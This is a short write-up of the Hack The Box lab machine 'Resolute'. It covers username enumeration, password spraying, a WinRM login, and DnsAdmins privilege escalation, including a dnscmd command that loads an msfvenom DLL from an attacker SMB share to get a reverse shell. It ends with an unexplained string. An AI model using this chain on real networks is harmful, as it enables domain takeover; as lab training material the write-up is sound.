Resolute HTB

user.txt

Run enum4linux script and find the usernames there, a username has a comment about a password, take all usernames and try against smbshare with that password, the username melanie with the password will work, now use winrm and connect and grab user.txt.

root.txt

Now I find the user ryan has used as a parameter to cmd.exe and then I login as ryan. After that I see a note saying that dues to change freeze, any system changes will be automatically reverted within 1 minute.

I see the groups and there is a group DnsAdmins. I had read this post https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise . I create a dll using msfvenom, and then I use impacket-smbserver and then use dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.0.0.2\gis\dnsprivesc.dll and then stop and start the dns. And get reverse shell.

The quieter you become, the more you are able to hear.
DHT4tMDxN34WgmtcX9em8AGMeqMpSechq4